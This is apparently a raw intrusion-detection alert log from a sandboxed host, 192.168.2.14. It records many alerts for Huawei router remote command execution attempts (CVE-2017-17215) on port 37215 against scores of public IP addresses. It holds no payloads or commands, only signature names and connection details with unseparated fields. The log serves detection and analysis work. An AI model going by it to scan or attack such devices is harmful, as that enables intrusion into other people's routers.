                                                    07/10/24-08:26:25.519019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530237215192.168.2.1441.117.143.92
                                                    07/10/24-08:26:33.257964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092237215192.168.2.1441.187.140.67
                                                    07/10/24-08:26:59.754191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716637215192.168.2.14184.10.79.180
                                                    07/10/24-08:27:07.361333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580437215192.168.2.14157.8.230.172
                                                    07/10/24-08:27:11.496514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4145637215192.168.2.14197.0.61.183
                                                    07/10/24-08:26:49.821091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404637215192.168.2.14188.135.180.228
                                                    07/10/24-08:26:28.859810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868037215192.168.2.1441.136.93.137
                                                    07/10/24-08:27:05.222461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430237215192.168.2.1441.68.54.58
                                                    07/10/24-08:26:11.177651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017037215192.168.2.14157.144.237.122
                                                    07/10/24-08:27:14.827269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888637215192.168.2.14157.166.35.216
                                                    07/10/24-08:27:03.007894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373637215192.168.2.14197.196.117.123
                                                    07/10/24-08:27:13.857998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839837215192.168.2.14157.234.67.18
                                                    07/10/24-08:26:25.483739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730837215192.168.2.14157.60.83.229
                                                    07/10/24-08:26:13.663247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079237215192.168.2.14179.100.17.30
                                                    07/10/24-08:26:55.429020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734837215192.168.2.14197.43.2.174
                                                    07/10/24-08:26:25.485582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367437215192.168.2.14197.37.74.220
                                                    07/10/24-08:27:07.392725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219637215192.168.2.141.0.202.42
                                                    07/10/24-08:27:33.845766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629637215192.168.2.14157.116.252.8
                                                    07/10/24-08:27:23.915755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710637215192.168.2.14157.77.49.111
                                                    07/10/24-08:27:23.925907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804437215192.168.2.1441.23.3.238
                                                    07/10/24-08:27:31.459998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4941437215192.168.2.1441.94.181.234
                                                    07/10/24-08:26:25.515486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546637215192.168.2.14197.71.123.245
                                                    07/10/24-08:26:43.786770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174637215192.168.2.14124.57.107.148
                                                    07/10/24-08:26:59.645558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537237215192.168.2.14157.154.3.181
                                                    07/10/24-08:27:07.356942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662037215192.168.2.1444.211.245.153
                                                    07/10/24-08:27:13.993007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673837215192.168.2.14157.80.1.254
                                                    07/10/24-08:26:47.943853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700637215192.168.2.1441.56.38.238
                                                    07/10/24-08:26:15.823629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798637215192.168.2.1441.156.45.75
                                                    07/10/24-08:26:49.804383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816237215192.168.2.1441.119.151.209
                                                    07/10/24-08:26:28.775037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698237215192.168.2.14207.34.5.230
                                                    07/10/24-08:27:30.549258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5076237215192.168.2.1441.27.155.120
                                                    07/10/24-08:26:22.270061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384437215192.168.2.14157.52.254.174
                                                    07/10/24-08:27:22.784576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241437215192.168.2.14157.67.156.63
                                                    07/10/24-08:26:33.256885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865837215192.168.2.1441.141.195.205
                                                    07/10/24-08:27:23.853234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238237215192.168.2.14117.196.151.174
                                                    07/10/24-08:26:34.191107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114437215192.168.2.14157.100.102.53
                                                    07/10/24-08:27:05.087236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449637215192.168.2.14145.73.67.52
                                                    07/10/24-08:26:17.989369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393837215192.168.2.14157.234.58.38
                                                    07/10/24-08:27:22.551128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564637215192.168.2.1441.51.71.233
                                                    07/10/24-08:27:10.558738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430237215192.168.2.14182.85.227.27
                                                    07/10/24-08:26:59.816598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034237215192.168.2.14197.129.134.177
                                                    07/10/24-08:27:33.886878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630637215192.168.2.14136.47.103.22
                                                    07/10/24-08:26:41.615628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103637215192.168.2.14197.7.94.140
                                                    07/10/24-08:27:11.480663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731437215192.168.2.14157.227.86.221
                                                    07/10/24-08:26:49.789652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516037215192.168.2.14157.251.180.151
                                                    07/10/24-08:27:02.918741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958437215192.168.2.14157.114.88.14
                                                    07/10/24-08:27:14.658405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700237215192.168.2.1480.51.237.162
                                                    07/10/24-08:26:20.148495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536037215192.168.2.1441.183.255.157
                                                    07/10/24-08:26:42.370410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676637215192.168.2.1441.189.217.22
                                                    07/10/24-08:26:28.647511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335237215192.168.2.14197.230.195.231
                                                    07/10/24-08:26:49.819719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668037215192.168.2.14197.195.140.198
                                                    07/10/24-08:27:27.151316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872837215192.168.2.14197.32.189.201
                                                    07/10/24-08:26:13.710026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287037215192.168.2.1441.124.94.167
                                                    07/10/24-08:27:05.122106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596237215192.168.2.1441.252.49.60
                                                    07/10/24-08:26:42.383706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940037215192.168.2.1439.177.250.223
                                                    07/10/24-08:27:14.858579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082037215192.168.2.14197.224.67.72
                                                    07/10/24-08:26:33.252129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649237215192.168.2.1441.75.199.249
                                                    07/10/24-08:27:08.415966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369037215192.168.2.14157.212.119.253
                                                    07/10/24-08:26:47.939159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438837215192.168.2.14197.86.67.110
                                                    07/10/24-08:27:19.253798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4366037215192.168.2.14197.224.78.233
                                                    07/10/24-08:27:30.532639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547637215192.168.2.1440.153.124.34
                                                    07/10/24-08:26:41.523308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244637215192.168.2.14197.153.60.33
                                                    07/10/24-08:26:47.989699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405037215192.168.2.1441.68.194.233
                                                    07/10/24-08:26:38.599918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471637215192.168.2.14111.26.127.235
                                                    07/10/24-08:26:57.560013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573237215192.168.2.14197.237.184.21
                                                    07/10/24-08:27:17.039425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855437215192.168.2.1441.7.86.93
                                                    07/10/24-08:26:34.194125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774037215192.168.2.14128.101.131.138
                                                    07/10/24-08:26:26.591446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546437215192.168.2.14157.77.36.230
                                                    07/10/24-08:27:28.064237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920237215192.168.2.14197.103.186.178
                                                    07/10/24-08:26:14.817942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394037215192.168.2.14197.113.78.184
                                                    07/10/24-08:26:59.618688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514237215192.168.2.14197.125.95.219
                                                    07/10/24-08:27:11.560548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911637215192.168.2.14157.104.94.78
                                                    07/10/24-08:27:05.146612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773237215192.168.2.1441.159.17.68
                                                    07/10/24-08:26:25.441344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355237215192.168.2.1441.113.247.183
                                                    07/10/24-08:26:36.383866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186237215192.168.2.14197.102.210.254
                                                    07/10/24-08:26:57.632458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761637215192.168.2.1476.130.200.1
                                                    07/10/24-08:26:26.598533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603437215192.168.2.14197.28.171.252
                                                    07/10/24-08:26:52.035645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438837215192.168.2.14197.54.124.34
                                                    07/10/24-08:27:22.839204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870837215192.168.2.14157.14.25.97
                                                    07/10/24-08:26:59.636045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329637215192.168.2.14221.30.44.12
                                                    07/10/24-08:26:41.447819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474037215192.168.2.1427.68.58.208
                                                    07/10/24-08:26:53.161125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508437215192.168.2.1499.175.7.118
                                                    07/10/24-08:27:14.893139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969837215192.168.2.1441.182.117.254
                                                    07/10/24-08:26:57.525977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601637215192.168.2.14197.111.27.28
                                                    07/10/24-08:26:38.641366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147837215192.168.2.14157.214.17.215
                                                    07/10/24-08:27:22.474550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927837215192.168.2.1441.117.180.136
                                                    07/10/24-08:26:17.949635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187037215192.168.2.1441.176.9.147
                                                    07/10/24-08:27:10.668166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106237215192.168.2.14197.168.41.255
                                                    07/10/24-08:26:41.535684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374637215192.168.2.14197.146.42.137
                                                    07/10/24-08:26:43.597937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538837215192.168.2.1441.106.159.163
                                                    07/10/24-08:27:05.198256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915237215192.168.2.14184.89.134.209
                                                    07/10/24-08:27:27.122406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6088837215192.168.2.1441.88.168.189
                                                    07/10/24-08:26:49.778030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703437215192.168.2.14193.106.74.6
                                                    07/10/24-08:26:59.873072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5218637215192.168.2.14157.111.41.24
                                                    07/10/24-08:27:14.020001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522637215192.168.2.14183.238.145.102
                                                    07/10/24-08:26:59.667418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053237215192.168.2.14104.194.88.255
                                                    07/10/24-08:27:02.836233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339637215192.168.2.14157.255.142.222
                                                    07/10/24-08:26:45.646163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029037215192.168.2.14195.158.77.249
                                                    07/10/24-08:27:28.174408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264437215192.168.2.14147.52.161.30
                                                    07/10/24-08:26:52.042445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047437215192.168.2.1441.89.75.183
                                                    07/10/24-08:26:52.040110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361637215192.168.2.14157.241.114.137
                                                    07/10/24-08:26:36.440414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661637215192.168.2.14197.15.100.101
                                                    07/10/24-08:26:43.820799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850237215192.168.2.1441.244.112.218
                                                    07/10/24-08:27:24.882807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280037215192.168.2.14157.103.219.146
                                                    07/10/24-08:26:47.841938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859437215192.168.2.14197.9.181.114
                                                    07/10/24-08:26:14.621778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524637215192.168.2.14157.7.141.249
                                                    07/10/24-08:26:41.439991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106837215192.168.2.1473.152.137.136
                                                    07/10/24-08:27:22.874012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457037215192.168.2.14157.216.17.220
                                                    07/10/24-08:27:32.576530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304437215192.168.2.14157.213.176.137
                                                    07/10/24-08:27:08.360438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593037215192.168.2.1441.129.8.147
                                                    07/10/24-08:27:22.783603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694837215192.168.2.1431.243.87.59
                                                    07/10/24-08:26:43.872861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479837215192.168.2.14197.189.7.195
                                                    07/10/24-08:26:15.849080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382037215192.168.2.14157.202.9.95
                                                    07/10/24-08:26:20.122842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5289037215192.168.2.1441.136.221.221
                                                    07/10/24-08:26:59.648560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860837215192.168.2.1441.5.130.17
                                                    07/10/24-08:26:28.867359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420037215192.168.2.14185.14.104.242
                                                    07/10/24-08:26:29.794005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485637215192.168.2.14157.120.178.56
                                                    07/10/24-08:26:17.947291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256837215192.168.2.1417.76.2.106
                                                    07/10/24-08:26:22.288558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641437215192.168.2.14157.50.63.83
                                                    07/10/24-08:27:02.996765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693837215192.168.2.1441.91.18.215
                                                    07/10/24-08:26:26.589238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626837215192.168.2.1441.74.164.230
                                                    07/10/24-08:26:28.639022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256837215192.168.2.14197.52.205.235
                                                    07/10/24-08:27:05.129960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404437215192.168.2.1441.145.135.5
                                                    07/10/24-08:26:42.368823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703037215192.168.2.1441.173.209.29
                                                    07/10/24-08:27:14.829677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536037215192.168.2.14157.167.105.151
                                                    07/10/24-08:26:13.783788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832037215192.168.2.14157.74.13.114
                                                    07/10/24-08:26:15.865935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705637215192.168.2.14197.236.115.181
                                                    07/10/24-08:26:41.325591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282437215192.168.2.14197.193.185.168
                                                    07/10/24-08:26:13.805293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086237215192.168.2.14157.134.15.66
                                                    07/10/24-08:26:52.064217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878037215192.168.2.14157.174.108.165
                                                    07/10/24-08:27:05.140242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385037215192.168.2.1441.11.163.72
                                                    07/10/24-08:27:22.844415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245637215192.168.2.1441.23.102.84
                                                    07/10/24-08:26:52.066193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342437215192.168.2.14105.131.224.137
                                                    07/10/24-08:27:22.873299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316237215192.168.2.14197.10.33.103
                                                    07/10/24-08:27:14.847892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894837215192.168.2.14197.70.27.198
                                                    07/10/24-08:27:00.565253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4907237215192.168.2.1494.209.85.2
                                                    07/10/24-08:26:59.577459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740437215192.168.2.1441.199.160.133
                                                    07/10/24-08:27:31.448352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074437215192.168.2.1424.77.177.19
                                                    07/10/24-08:26:51.988917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476637215192.168.2.1441.162.174.37
                                                    07/10/24-08:26:15.813781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5195837215192.168.2.14197.147.30.191
                                                    07/10/24-08:27:31.473922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469437215192.168.2.1441.71.137.21
                                                    07/10/24-08:27:33.866007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252037215192.168.2.1414.107.100.35
                                                    07/10/24-08:26:17.939725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936637215192.168.2.1441.151.78.77
                                                    07/10/24-08:27:24.988744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868637215192.168.2.14157.232.49.32
                                                    07/10/24-08:26:43.926715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473237215192.168.2.1441.145.177.137
                                                    07/10/24-08:26:57.647233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428037215192.168.2.1441.129.110.138
                                                    07/10/24-08:26:11.588722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422037215192.168.2.1441.235.170.24
                                                    07/10/24-08:26:59.828801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116837215192.168.2.14197.12.217.84
                                                    07/10/24-08:26:36.349242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444037215192.168.2.14197.22.81.154
                                                    07/10/24-08:27:22.452806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227237215192.168.2.1441.216.221.79
                                                    07/10/24-08:27:30.426359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4546237215192.168.2.14111.2.5.6
                                                    07/10/24-08:26:49.921698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880437215192.168.2.14197.52.144.177
                                                    07/10/24-08:27:14.879570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067237215192.168.2.14197.187.4.87
                                                    07/10/24-08:26:28.917896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542437215192.168.2.14197.153.20.64
                                                    07/10/24-08:26:31.048424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495037215192.168.2.14197.12.174.30
                                                    07/10/24-08:27:17.030907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240637215192.168.2.14123.172.151.46
                                                    07/10/24-08:26:36.441916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482237215192.168.2.14192.38.208.254
                                                    07/10/24-08:26:22.299447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073437215192.168.2.14197.252.23.137
                                                    07/10/24-08:26:23.279248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696637215192.168.2.1441.54.105.48
                                                    07/10/24-08:26:49.817935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991037215192.168.2.14157.89.214.102
                                                    07/10/24-08:27:28.082324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585037215192.168.2.1441.185.241.200
                                                    07/10/24-08:27:05.188794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772637215192.168.2.14197.73.121.14
                                                    07/10/24-08:27:33.854802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526437215192.168.2.14197.100.161.64
                                                    07/10/24-08:26:53.230635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782637215192.168.2.14197.68.164.74
                                                    07/10/24-08:27:23.962795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296837215192.168.2.14197.35.11.95
                                                    07/10/24-08:26:20.187450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246637215192.168.2.1441.199.114.77
                                                    07/10/24-08:27:11.501103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503237215192.168.2.14157.173.28.226
                                                    07/10/24-08:26:43.626210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034237215192.168.2.1441.251.230.155
                                                    07/10/24-08:27:14.827269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871237215192.168.2.14197.129.156.204
                                                    07/10/24-08:27:10.635784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139437215192.168.2.1425.38.142.215
                                                    07/10/24-08:26:26.618232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702437215192.168.2.1441.32.231.233
                                                    07/10/24-08:26:28.875517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974037215192.168.2.14197.200.231.146
                                                    07/10/24-08:26:29.890677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695637215192.168.2.14157.6.46.147
                                                    07/10/24-08:27:24.912875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221637215192.168.2.14157.53.163.172
                                                    07/10/24-08:26:59.560985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621837215192.168.2.14197.221.99.88
                                                    07/10/24-08:26:55.302858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363437215192.168.2.14206.44.181.55
                                                    07/10/24-08:26:38.529678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309237215192.168.2.1441.163.56.173
                                                    07/10/24-08:26:59.768994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599237215192.168.2.14197.233.97.191
                                                    07/10/24-08:27:05.109463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111037215192.168.2.1441.120.194.28
                                                    07/10/24-08:27:07.353904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990637215192.168.2.14157.198.104.57
                                                    07/10/24-08:27:33.904086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592237215192.168.2.14157.31.9.15
                                                    07/10/24-08:27:13.961699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186037215192.168.2.1441.130.225.33
                                                    07/10/24-08:27:14.867172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354637215192.168.2.14157.208.242.225
                                                    07/10/24-08:27:13.930927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906237215192.168.2.14157.133.195.159
                                                    07/10/24-08:27:22.877678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973037215192.168.2.14157.8.78.11
                                                    07/10/24-08:26:14.657755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3666637215192.168.2.1442.81.26.219
